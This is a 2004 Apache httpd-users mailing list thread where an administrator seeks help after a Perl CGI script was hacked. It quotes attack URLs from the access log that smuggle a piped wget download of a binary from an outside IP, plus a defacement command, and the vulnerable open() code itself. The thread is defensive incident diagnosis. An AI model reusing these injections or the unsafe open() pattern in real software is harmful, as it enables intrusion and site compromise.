httpd-users mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Murthy Ambaru <bobby...@yahoo.com>
Subject Re: [users@httpd] Security Problem
Date Sun, 05 Dec 2004 21:31:49 GMT
Thanks Dick and Ivan for the input....Well the programmer who worked on this is no longer here.
So would it be sufficient if i just check in the Parse form if the input file has any kind
of weird characters (such as %, |, wget etc.) and if it does, redirect it somewhere else?
Or should i check if the file exists in the system? I thought of doing this initially, but
i could not reproduce what the hacker did by using the same command. I wanted to  reproduce
it and then correct the script and retest it again so as to be sure that it is fixed
Also, this in not in linux (its windows), so what should i do to check that the system is
not already compromised....thanks a lot

"Ivan Barrera A." <Bruce@Ivn.cl> wrote:
As i see, you take the parameter file from the URL without parsing it 
(as dick explained on other post too)

my $data_file =
"/data/httpd/vhosts/xyz.org/httpdocs/scriptfiles/$FORM{file}";
if (!open(FILE,"$data_file")) { die "Can't open";}

You are not checking if the file is really valid, and are passing 
additional cmds without even noticing. (the pipe is really dangerous)

As Dick said... ask your programmer to fix this right up. (and try to 
examine your machine.. it may be already comprimsed.. if in redhat run 
rpm -VVV procps net-tools util-linux rpm , if nothing comes up, your good)



Murthy Ambaru wrote:
> Thanks for the explanation.So the file can be downloaded to /tmp/bind 
> directory in the server executing that script. As i said, i tried typing 
> in the URL used and got nothing. I did not check the /tmp/bind though(I 
> did not find that in the interface that i use to manage files on 
> server). So what would be an secure way of opening the file?
> The script is in PERL. I am adding it below. Can you see anything weird 
> in it?? Thanks...
> 
> #!/usr/local/bin/perl
> print "Content-type: text/html\n\n";
> &parseForm;
> open(HEADER,"printheader.html") ;
> my @HEADER = ;
> close(HEADER);
> #print it! Put a # before print if you don't want a header printed...
> print "@HEADER";
> my $data_file = 
> "/data/httpd/vhosts/xyz.org/httpdocs/scriptfiles/$FORM{file}";
> if (!open(FILE,"$data_file")) { die "Can't open";}
> my @FILE = ;
> close(FILE);
> $print = 1 ;
> foreach $line(@FILE) {
> if ($line =~ /beginimage/) {
> print $line ;
> $print = 0;
> next ;
> }
> if ($line =~ /endimage/) { $print = 1 ; }
> if ($print eq "1") {
> print $line;
> }
> }
> 
> ########################################################
> sub parseForm {
> if ($ENV{'REQUEST_METHOD'} eq 'GET') {
> # Split the name-value pairs
> @pairs = split(/&/, $ENV{'QUERY_STRING'});
> }
> elsif ($ENV{'REQUEST_METHOD'} eq 'POST') {
> 
> read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
> # Split the name-value pairs
> @pairs = split(/&/, $buffer);
> }
> foreach $pair (@pairs) {
> ($name, $value) = split(/=/, $pair);
> # Un-Webify plus signs and %-encoding
> $value =~ tr/+/ /;
> $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
> $FORM{$name} = $value;
> }
> }
> 
> 
> */"Ivan Barrera A." 
/* wrote:
> 
> I mean, the cgi script (which i dont know anything about) seems to
> "open
> " a file reffered by ?file= ... Probably an insecure way of "opening"
> the file, leads to execute the rest of the statement.
> 
> Look :
> 
> ?file=/2004/0722-08.htm|wget%20http://64.58.72.242/bind%20-O/tmp/bind
> 
> After the correct page, a pipe, and wget http://blabla/bind -O/tmpbind
> is appended. So , if the script execute this, the command wget will
> exec, and download that file into /tmp/bind.
> After that, using the same technique, you can exec anything you
> want. so
> the problem is the way of opening (or doing something else) to the
> files
> in the cgi script.
> is it a c , perl , php , or any other language script ?
> 
> Murthy Ambaru wrote:
> > Thanks for the response Ivan. I am sorry i realy did not
> understand what
> > you mean by "download the file to /tmp/bind". when the printer
> friendly
> > link is clicked, this is the URL that will be accessed:
> > http://www.xyz.org/cgi-bin/xyz.cgi?file=/2004/0722-08.htm
> > ofcourse it depends on the page being clicked at. So the file
> name will
> > be passed as parameter to the CGI file. I included the CGI code
> in my
> > earlier mail, could you please take a look.
> > Thanks,
> > Murthy
> >
> > */"Ivan Barrera A." /* wrote:
> >
> > the url you entered, download the file bind to /tmp/bind . It's
> > probably
> > an irc bot or a backdoor.
> > If someone did that, the version of the cgi script, is unsecure, and
> > should be revised.
> >
> > Im sorry if i didnt clarify enough, but would be useful to see
> that cgi.
> >
> > Murthy Ambaru wrote:
> > > I have a question regarding security. There is a web site that
> > has an
> > > printer friendly version of web pages being dsiplayed using a CGI
> > > script. Apparently when this was in use, the site was hacked and
> > some
> > > unwanted stuff posted on the site. I had a look at the access.log
> > when
> > > this occurred and this was what showed up(I just replaced the
> > site name
> > > with xyz, everything else is same):
> > >
> > >
> > > /images/newswireprint.gif HTTP/1.0" 304 -
> > >
> > > "http://www.xyz.org/cgi-bin/xyz.cgi?file=/2004/0722-0
> > >
> > > 8.htm|wget%20http://64.58.72.242/bind%20-O/tmp/bind| " "Mozilla/4.0
> > >
> > >
> > > GET
> > >
> >
> /cgi-bin/xyz.cgi?file=|echo%20innocent%20boys...%20%3E%20/data/httpd/v
> > > hosts/xyz.org/httpdocs/index.html|
> > >
> > > Can anyone understand how are they able to hack? I tried
> > reproducing it
> > > by typing in the above URL used by hackers, but could get nothing
> > out of
> > > it. The permissions on all the html docs folders are set to 755.
> > >
> > > Below is the CGI file being used. It basically strips images off.
> > Can
> > > anyone help with this problem? what should i be looking at to
> > plug off
> > > the security holes....Thanks a lot
> > >
> > > -Murthy
> > >
> > >
> > >
> > > #!/usr/local/bin/perl
> > >
> > > print "Content-type: text/html\n\n";
> > >
> > > &parseForm;
> > >
> > > open(HEADER,"printheader.html") ;
> > > my @HEADER = ;
> > > close(HEADER);
> > > #print it! Put a # before print if you don't want a header
> printed...
> > > print "@HEADER";
> > >
> > > my $data_file =
> > > "/data/httpd/vhosts/xyz.org/httpdocs/scriptfiles/$FORM{file}";
> > >
> > > if (!open(FILE,"$data_file")) { die "Can't open";}
> > > my @FILE = ;
> > > close(FILE);
> > >
> > > $print = 1 ;
> > >
> > > foreach $line(@FILE) {
> > >
> > > if ($line =~ /beginimage/) {
> > > print $line ;
> > > $print = 0;
> > > next ;
> > > }
> > >
> > > if ($line =~ /endimage/) { $print = 1 ; }
> > >
> > > if ($print eq "1") {
> > > print $line;
> > > }
> > >
> > > }
> > >
> > >
> > > ########################################################
> > >
> > > sub parseForm {
> > >
> > > if ($ENV{'REQUEST_METHOD'} eq 'GET') {
> > > # Split the name-value pairs
> > > @pairs = split(/&/, $ENV{'QUERY_STRING'});
> > > }
> > > elsif ($ENV{'REQUEST_METHOD'} eq 'POST') {
> > >
> > >
> > > read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
> > >
> > > # Split the name-value pairs
> > > @pairs = split(/&/, $buffer);
> > > }
> > > foreach $pair (@pairs) {
> > > ($name, $value) = split(/=/, $pair);
> > >
> > > # Un-Webify plus signs and %-encoding
> > > $value =~ tr/+/ /;
> > > $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
> > >
> > > $FORM{$name} = $value;
> > > }
> > >
> > > }
> > >
> > >
> > >
> > >
> > >
> >
> ------------------------------------------------------------------------
> > > Do you Yahoo!?
> > > Meet the all-new My Yahoo!  Try it today!
> >
> > ---------------------------------------------------------------------
> > The official User-To-User support forum of the Apache HTTP Server
> > Project.
> > See for more info.
> > To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> > " from the digest: users-digest-unsubscribe@httpd.apache.org
> > For additional commands, e-mail: users-help@httpd.apache.org
> >
> >
> ------------------------------------------------------------------------
> > Do you Yahoo!?
> > The all-new My Yahoo!  What will yours do?
> 
> ---------------------------------------------------------------------
> The official User-To-User support forum of the Apache HTTP Server
> Project.
> See for more info.
> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> " from the digest: users-digest-unsubscribe@httpd.apache.org
> For additional commands, e-mail: users-help@httpd.apache.org
> 
> ------------------------------------------------------------------------
> Do you Yahoo!?
> Yahoo! Mail - 250MB free storage. Do more. Manage less. 
> 

---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org


		
---------------------------------
Do you Yahoo!?
 Read only the mail you want - Yahoo! Mail SpamGuard.
Mime
View raw message